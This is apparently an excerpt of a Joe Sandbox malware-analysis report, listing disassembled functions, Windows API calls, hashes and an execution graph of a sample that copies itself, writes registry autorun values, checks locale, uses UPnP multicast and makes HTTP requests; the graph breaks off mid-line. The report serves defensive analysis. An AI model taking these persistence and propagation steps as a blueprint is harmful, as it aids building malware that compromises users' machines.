                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                              • String ID: pdu
                                              • API String ID: 309973729-2320407122
                                              • Opcode ID: 6b6ea7fc194c066d272c2ceb60e6e8d4b7d6d70c2bd26222ba97c1c57b6b1a03
                                              • Instruction ID: d282b52b3110f6f030980250f42d45aa65f4851f6724e2164e4de9b2c85264d0
                                              • Opcode Fuzzy Hash: 6b6ea7fc194c066d272c2ceb60e6e8d4b7d6d70c2bd26222ba97c1c57b6b1a03
                                              • Instruction Fuzzy Hash: 6101D6765003009BCB20AF51ECC0E9B7779AF48311704467AFD04AB396C738E84187B9
                                              Function 004062C0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDriveTypeW.KERNEL32(0040629F), ref: 004062CD
                                              • QueryDosDeviceW.KERNEL32(0040629F,?,00000208), ref: 0040630C
                                              • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00406324
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DeviceDriveQueryType
                                              • String ID: \??\
                                              • API String ID: 1681518211-3047946824
                                              • Opcode ID: 1f4486d3417c416fbe6947eda0d50e0154391f7c0caa962a9d661e7b197f6568
                                              • Instruction ID: fe1cba3e8f96ca8ec28924db8accccc61f2e919e988f9d14e04ecf4ac666ff3a
                                              • Opcode Fuzzy Hash: 1f4486d3417c416fbe6947eda0d50e0154391f7c0caa962a9d661e7b197f6568
                                              • Instruction Fuzzy Hash: 1901FFB0A4021CEBCB20DF55DD49BDAB7B4AB04704F00C0BAAA05A7280E6759ED5DF9C
                                              Function 00401100 Relevance: 6.1, APIs: 4, Instructions: 86synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • ioctlsocket.WS2_32 ref: 0040112B
                                              • recvfrom.WS2_32 ref: 0040119C
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
                                              • WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                              • String ID:
                                              • API String ID: 3980219359-0
                                              • Opcode ID: 9fd04ca368f2f0733dbd00e11fcdc64336c0dc17fc499274760987b24178d786
                                              • Instruction ID: e1b7ef358c802af59afb00f280b99e3e8e19274dac2adc7c4e0c886c1a13037e
                                              • Opcode Fuzzy Hash: 9fd04ca368f2f0733dbd00e11fcdc64336c0dc17fc499274760987b24178d786
                                              • Instruction Fuzzy Hash: 1521C3B1504301AFD304DF65DC84A6BB7E9EF88314F004A3EF555A62A0E774DD488BEA
                                              Function 00401F50 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
                                              • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
                                              • WSAGetLastError.WS2_32 ref: 00401FB9
                                              • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                              • String ID:
                                              • API String ID: 2074799992-0
                                              • Opcode ID: 6bed54afebf4a7a641f0d3d0188a4da0f589ce10c8675e9945177f158b09e6ba
                                              • Instruction ID: 85cdc4ac02e7a7d961e62fa06f42dc9c3305788cd6d7a2bd32de2e1c20a60a18
                                              • Opcode Fuzzy Hash: 6bed54afebf4a7a641f0d3d0188a4da0f589ce10c8675e9945177f158b09e6ba
                                              • Instruction Fuzzy Hash: DD212F715083159BC200DF55D884D5BB7E8BFCCB54F044A2EF59493291D734EA49CBAA
                                              Function 00407300 Relevance: 6.1, APIs: 4, Instructions: 60sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • StrChrA.SHLWAPI(00000000,0000007C), ref: 00407326
                                              • DeleteUrlCacheEntry.WININET(00000000), ref: 00407348
                                              • Sleep.KERNEL32(000003E8), ref: 00407361
                                              • DeleteUrlCacheEntry.WININET(?), ref: 00407389
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CacheDeleteEntry$Sleep
                                              • String ID:
                                              • API String ID: 672405725-0
                                              • Opcode ID: de31647e4212ff5a036519ed2976cc2a7ac52ffd671279e5da701e067ce87bdf
                                              • Instruction ID: 2037616d4c8183bc1dcd880db7f677971b3714fceeeaba453b7e7dde7ca31e21
                                              • Opcode Fuzzy Hash: de31647e4212ff5a036519ed2976cc2a7ac52ffd671279e5da701e067ce87bdf
                                              • Instruction Fuzzy Hash: CC217F75E04208FBDB04DFA4D885B9EBB74AF45305F10C1B9ED016B391D679AA80DB49
                                              Function 00401AE0 Relevance: 6.0, APIs: 4, Instructions: 49networksleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
                                              • WSAGetLastError.WS2_32 ref: 00401B12
                                              • Sleep.KERNEL32(00000001), ref: 00401B28
                                              • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Send$ErrorLastSleep
                                              • String ID:
                                              • API String ID: 2121970615-0
                                              • Opcode ID: 68b99e883f80ec4d8e473af3bb6ab78542c6fab184647b02e4118960a37caac2
                                              • Instruction ID: 6027246a5f20d5291fae036152240cd5c1f9414458335baedc5b4335fd2ad738
                                              • Opcode Fuzzy Hash: 68b99e883f80ec4d8e473af3bb6ab78542c6fab184647b02e4118960a37caac2
                                              • Instruction Fuzzy Hash: 8F014F712483046EE7209B96DC88F9B77A8EBC4711F508429F608961C0D7B5A9459B79
                                              Function 0040D9A0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                              Download Yara Rule
                                              APIs
                                              • EnterCriticalSection.KERNEL32(?), ref: 0040D9B9
                                              • CloseHandle.KERNEL32(?), ref: 0040D9E8
                                              • LeaveCriticalSection.KERNEL32(?), ref: 0040D9F7
                                              • DeleteCriticalSection.KERNEL32(?), ref: 0040DA04
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                              • String ID:
                                              • API String ID: 3102160386-0
                                              • Opcode ID: ed15acf6120be580f2efb04119f98ac13af0f23ee5fa2c95d393dc01a9c3cf4d
                                              • Instruction ID: da3f5db6e059a7c592b49e611c360a1232ff957d222e4d531544d3c603d0b457
                                              • Opcode Fuzzy Hash: ed15acf6120be580f2efb04119f98ac13af0f23ee5fa2c95d393dc01a9c3cf4d
                                              • Instruction Fuzzy Hash: 2A1121B4E00208EBDB08DF94D984A9DB775FF44309F1081A9E806A7341D739EF95DB85
                                              Function 004017A0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                              Download Yara Rule
                                              APIs
                                              • EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                              • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                              • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                              • String ID:
                                              • API String ID: 2223660684-0
                                              • Opcode ID: 03c0a71711caba3423ec18258d7e67e7f1e7096498cee499a2df36c29d80c934
                                              • Instruction ID: 660f416c0ba452cd5c41a421238d9990710d8623252f526507a58679470d43f9
                                              • Opcode Fuzzy Hash: 03c0a71711caba3423ec18258d7e67e7f1e7096498cee499a2df36c29d80c934
                                              • Instruction Fuzzy Hash: 2301F27A242300AFC3209F26ED84A9B73F8AF85B11F00443EE546E3A50DB39E401CB28
                                              Function 00406FC0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00407250: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407270
                                              • SysFreeString.OLEAUT32(00000000), ref: 004071D8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFreeInstanceString
                                              • String ID: Microsoft Corporation
                                              • API String ID: 586785272-3838278685
                                              • Opcode ID: 47348544a12607a113ad889ec3bd29dddf14831e53aa8f734b6601f1a55deb08
                                              • Instruction ID: e6ff3ca51e6e637cb53d631dd4329f9e07d4b07e7a8aed38044ad589faa32fb5
                                              • Opcode Fuzzy Hash: 47348544a12607a113ad889ec3bd29dddf14831e53aa8f734b6601f1a55deb08
                                              • Instruction Fuzzy Hash: 0F91EC75A0410ADFCB04DF98C894AAFB3B5BF89304F208169E515BB3E0D774AD41CBA6
                                              Function 0040DF10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0040E150: memset.NTDLL ref: 0040E178
                                                • Part of subcall function 0040E150: InternetCrackUrlA.WININET(0040DC29,00000000,10000000,0000003C), ref: 0040E1C8
                                                • Part of subcall function 0040E150: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E1D8
                                                • Part of subcall function 0040E150: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E211
                                                • Part of subcall function 0040E150: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E247
                                                • Part of subcall function 0040E150: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E26F
                                                • Part of subcall function 0040E150: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E2B8
                                                • Part of subcall function 0040E150: InternetCloseHandle.WININET(00000000), ref: 0040E347
                                                • Part of subcall function 0040E040: SysAllocString.OLEAUT32(00000000), ref: 0040E06E
                                                • Part of subcall function 0040E040: CoCreateInstance.OLE32(00412A18,00000000,00004401,00412A08,00000000), ref: 0040E096
                                                • Part of subcall function 0040E040: SysFreeString.OLEAUT32(00000000), ref: 0040E131
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040DFEB
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040DFF5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                              • String ID: %S%S
                                              • API String ID: 1017111014-3267608656
                                              • Opcode ID: 8050ae28274428bf3bfa8973c943a31095365cba4dcb11065546cc064dfc1af3
                                              • Instruction ID: 0d7a9dfb02ef55e8037a527aa51067439edd5703c05fc0bf7ce6e387078fb77b
                                              • Opcode Fuzzy Hash: 8050ae28274428bf3bfa8973c943a31095365cba4dcb11065546cc064dfc1af3
                                              • Instruction Fuzzy Hash: 3E416BB5E002099FCB04DBE5C885AEFB7B4BF88304F108929E505B7391D778AA45CBA1
                                              Function 0040DBD0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON
                                              Download Yara Rule
                                              APIs
                                              • CoInitializeEx.OLE32(00000000,00000002,?,?,?,00407FB2), ref: 0040DBDA
                                                • Part of subcall function 0040DCA0: socket.WS2_32(00000002,00000002,00000011), ref: 0040DCBA
                                                • Part of subcall function 0040DCA0: htons.WS2_32(0000076C), ref: 0040DCF0
                                                • Part of subcall function 0040DCA0: inet_addr.WS2_32(239.255.255.250), ref: 0040DCFF
                                                • Part of subcall function 0040DCA0: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040DD1D
                                                • Part of subcall function 0040DCA0: bind.WS2_32(000000FF,?,00000010), ref: 0040DD53
                                                • Part of subcall function 0040DCA0: lstrlenA.KERNEL32(00411D70,00000000,?,00000010), ref: 0040DD6C
                                                • Part of subcall function 0040DCA0: sendto.WS2_32(000000FF,00411D70,00000000), ref: 0040DD7B
                                                • Part of subcall function 0040DCA0: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040DD95
                                                • Part of subcall function 0040DF10: SysFreeString.OLEAUT32(00000000), ref: 0040DFEB
                                                • Part of subcall function 0040DF10: SysFreeString.OLEAUT32(00000000), ref: 0040DFF5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                              • String ID: TCP$UDP
                                              • API String ID: 1519345861-1097902612
                                              • Opcode ID: eec8d27479aca65ce9d536c40e716b47b94f3bf0f210a133f1cac4c1684116a5
                                              • Instruction ID: a00cbb5bcfca6c5959655f637b3ec774768ac2685424fa301eff230043eb3e38
                                              • Opcode Fuzzy Hash: eec8d27479aca65ce9d536c40e716b47b94f3bf0f210a133f1cac4c1684116a5
                                              • Instruction Fuzzy Hash: A011B4B4D04208EBEB00EBD4DD85FAE7774EB44308F14886EE511772C2D6B86A54DB59
                                              Function 00405E50 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                              Download Yara Rule
                                              APIs
                                              • EnterCriticalSection.KERNEL32(004174D8,?,00000000,?), ref: 00405E5F
                                              • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405E9E
                                              • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F13
                                              • LeaveCriticalSection.KERNEL32(004174D8), ref: 00405F30
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalSectionmemcpy$EnterLeave
                                              • String ID:
                                              • API String ID: 469056452-0
                                              • Opcode ID: 4996b29259c9349675d46381685df80cb9fbc453c004c8ef9eea7ef5662ad9f1
                                              • Instruction ID: 40e991b6b4618cd04087b2a5cfa683f62b0bf83616b4f0bda180c9645beb9567
                                              • Opcode Fuzzy Hash: 4996b29259c9349675d46381685df80cb9fbc453c004c8ef9eea7ef5662ad9f1
                                              • Instruction Fuzzy Hash: C2218B70904208ABCB04DB94D885BDEBBB5EB94304F1481BAE845672C1C77CAA85CB9A

                                              Execution Graph

                                              Execution Coverage:15.1%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:0%
                                              Total number of Nodes:1486
                                              Total number of Limit Nodes:39
                                              execution_graph 4382 407500 Sleep CreateMutexA GetLastError 4383 407536 ExitProcess 4382->4383 4384 40753e 6 API calls 4382->4384 4385 4075e3 4384->4385 4386 4078a9 Sleep RegOpenKeyExW 4384->4386 4558 40ecc0 GetLocaleInfoA strcmp 4385->4558 4388 407902 RegOpenKeyExW 4386->4388 4389 4078d6 RegSetValueExA RegCloseKey 4386->4389 4391 407950 RegOpenKeyExW 4388->4391 4392 407924 RegSetValueExA RegCloseKey 4388->4392 4389->4388 4395 407972 RegSetValueExA RegCloseKey 4391->4395 4396 40799e RegOpenKeyExW 4391->4396 4392->4391 4393 4075f0 ExitProcess 4394 4075f8 ExpandEnvironmentStringsW wsprintfW CopyFileW 4397 40764c SetFileAttributesW RegOpenKeyExW 4394->4397 4398 4076de Sleep wsprintfW CopyFileW 4394->4398 4395->4396 4399 4079c0 RegSetValueExA RegCloseKey 4396->4399 4400 4079ec RegOpenKeyExW 4396->4400 4397->4398 4403 40767d wcslen RegSetValueExW 4397->4403 4404 407726 SetFileAttributesW RegOpenKeyExW 4398->4404 4405 4077b8 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 4398->4405 4399->4400 4401 407a0e RegSetValueExA RegCloseKey 4400->4401 4402 407a3f RegOpenKeyExW 4400->4402 4406 407ae4 RegOpenKeyExW 4401->4406 4408 407a61 RegCreateKeyExW RegCloseKey 4402->4408 4409 407a96 RegOpenKeyExW 4402->4409 4403->4398 4410 4076b2 RegCloseKey 4403->4410 4404->4405 4411 407757 wcslen RegSetValueExW 4404->4411 4405->4386 4407 407817 SetFileAttributesW RegOpenKeyExW 4405->4407 4414 407b06 RegSetValueExA RegCloseKey 4406->4414 4415 407b37 RegOpenKeyExW 4406->4415 4407->4386 4412 407848 wcslen RegSetValueExW 4407->4412 4408->4409 4409->4406 4413 407ab8 RegSetValueExA RegCloseKey 4409->4413 4560 40ef10 memset memset CreateProcessW 4410->4560 4411->4405 4417 40778c RegCloseKey 4411->4417 4412->4386 4418 40787d RegCloseKey 4412->4418 4413->4406 4419 407c33 RegOpenKeyExW 4414->4419 4421 407b59 RegCreateKeyExW RegCloseKey 4415->4421 4422 407b8e RegOpenKeyExW 4415->4422 4423 40ef10 6 API calls 4417->4423 4424 40ef10 6 API calls 4418->4424 4428 407c81 RegOpenKeyExW 4419->4428 4429 407c55 RegSetValueExA RegCloseKey 4419->4429 4421->4422 4426 407bb0 RegCreateKeyExW RegCloseKey 4422->4426 4427 407be5 RegOpenKeyExW 4422->4427 4430 4077a5 4423->4430 4434 407896 4424->4434 4425 4076d6 ExitProcess 4426->4427 4427->4419 4435 407c07 RegSetValueExA RegCloseKey 4427->4435 4432 407ca3 RegSetValueExA RegCloseKey 4428->4432 4433 407ccf RegOpenKeyExA 4428->4433 4429->4428 4430->4405 4431 4077b0 ExitProcess 4430->4431 4432->4433 4436 407cf5 8 API calls 4433->4436 4437 407ddb RegOpenKeyExA 4433->4437 4434->4386 4438 4078a1 ExitProcess 4434->4438 4435->4419 4436->4437 4439 407e01 8 API calls 4437->4439 4440 407ee7 Sleep 4437->4440 4439->4440 4469 40cd60 4440->4469 4443 408071 4444 407f02 9 API calls 4472 405b60 InitializeCriticalSection CreateFileW 4444->4472 5772 4073b0 4444->5772 5779 405820 4444->5779 5788 406b50 Sleep GetModuleFileNameW 4444->5788 4450 407fb7 CreateEventA 4504 40c490 4450->4504 4459 40d6f0 340 API calls 4460 408017 4459->4460 4461 40d6f0 340 API calls 4460->4461 4462 408033 4461->4462 4463 40d6f0 340 API calls 4462->4463 4464 40804f 4463->4464 4549 40d860 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 4464->4549 4466 40805f 4566 40d9a0 4466->4566 4575 40cd30 4469->4575 4473 405c85 4472->4473 4474 405b98 CreateFileMappingW 4472->4474 4486 40dbd0 CoInitializeEx 4473->4486 4475 405bb9 MapViewOfFile 4474->4475 4476 405c7b CloseHandle 4474->4476 4477 405c71 CloseHandle 4475->4477 4478 405bd8 GetFileSize 4475->4478 4476->4473 4477->4476 4482 405bed 4478->4482 4479 405c67 UnmapViewOfFile 4479->4477 4480 405bfc 4480->4479 4482->4479 4482->4480 4483 405c2c 4482->4483 4704 40cdb0 4482->4704 4711 405c90 4482->4711 4484 40a740 _invalid_parameter 3 API calls 4483->4484 4484->4480 5021 40dca0 socket 4486->5021 4488 407fb2 4499 406f70 CoInitializeEx SysAllocString 4488->4499 4491 40dc3a 5046 40b010 htons 4491->5046 4492 40dbf0 4492->4488 4492->4491 4498 40dc78 4492->4498 5031 40df10 4492->5031 4497 40ea00 24 API calls 4497->4498 5065 40a860 4498->5065 4500 406f92 4499->4500 4501 406fa8 CoUninitialize 4499->4501 5210 406fc0 4500->5210 4501->4450 5219 40c450 4504->5219 4507 40c450 3 API calls 4508 40c4ae 4507->4508 4509 40c450 3 API calls 4508->4509 4510 40c4be 4509->4510 4511 40c450 3 API calls 4510->4511 4512 407fcf 4511->4512 4513 40d6c0 4512->4513 4514 40a320 7 API calls 4513->4514 4515 40d6cb 4514->4515 4516 407fd9 4515->4516 4517 40d6d7 InitializeCriticalSection 4515->4517 4518 40b850 InitializeCriticalSection 4516->4518 4517->4516 4523 40b86a 4518->4523 4519 40b899 CreateFileW 4521 40b8c0 CreateFileMappingW 4519->4521 4522 40b982 4519->4522 4525 40b8e1 MapViewOfFile 4521->4525 4526 40b978 CloseHandle 4521->4526 5274 40b0f0 EnterCriticalSection 4522->5274 4523->4519 5226 40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 4523->5226 5227 40b430 4523->5227 4527 40b8fc GetFileSize 4525->4527 4528 40b96e CloseHandle 4525->4528 4526->4522 4535 40b91b 4527->4535 4528->4526 4530 40b987 4531 40d6f0 340 API calls 4530->4531 4532 407fe3 4531->4532 4537 40d6f0 4532->4537 4533 40b964 UnmapViewOfFile 4533->4528 4535->4533 4536 40b430 32 API calls 4535->4536 5277 40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 4535->5277 4536->4535 4538 40d707 EnterCriticalSection 4537->4538 4539 407ffc 4537->4539 5302 40d7e0 4538->5302 4539->4459 4542 40d7cb LeaveCriticalSection 4542->4539 4543 40a570 9 API calls 4544 40d749 4543->4544 4544->4542 4545 40d75b CreateThread 4544->4545 4545->4542 4546 40d77e 4545->4546 5307 40d440 4545->5307 5313 401f50 GetQueuedCompletionStatus 4545->5313 5320 40dae0 4545->5320 5331 40db80 4545->5331 5338 40d490 4545->5338 5345 401920 GetTickCount WaitForSingleObject 4545->5345 5368 40b9b0 4545->5368 4547 40d7a2 GetCurrentProcess GetCurrentProcess DuplicateHandle 4546->4547 4548 40d7c4 4546->4548 4547->4548 4548->4542 4550 40d896 InterlockedExchangeAdd 4549->4550 4551 40d979 GetCurrentThread SetThreadPriority 4549->4551 4550->4551 4555 40d8b0 4550->4555 4551->4466 4552 40d8c9 EnterCriticalSection 4552->4555 4553 40d937 LeaveCriticalSection 4553->4555 4557 40d94e 4553->4557 4554 40d913 WaitForSingleObject 4554->4555 4555->4551 4555->4552 4555->4553 4555->4554 4556 40d96c Sleep 4555->4556 4555->4557 4556->4555 4557->4551 4559 4075e8 4558->4559 4559->4393 4559->4394 4561 40ef81 ShellExecuteW 4560->4561 4562 40ef72 Sleep 4560->4562 4563 40efb6 4561->4563 4564 40efa7 Sleep 4561->4564 4565 4076cb 4562->4565 4563->4565 4564->4565 4565->4398 4565->4425 4567 40806e 4566->4567 4568 40d9ac EnterCriticalSection 4566->4568 4567->4443 4569 40d9c8 4568->4569 4570 40d9f0 LeaveCriticalSection DeleteCriticalSection 4569->4570 4571 40d9db CloseHandle 4569->4571 4572 40a740 _invalid_parameter 3 API calls 4570->4572 4571->4569 4573 40da16 4572->4573 4574 40a740 _invalid_parameter 3 API calls 4573->4574 4574->4567 4578 40c980 4575->4578 4579 40c9b3 4578->4579 4580 40c99e 4578->4580 4582 407ef7 4579->4582 4584 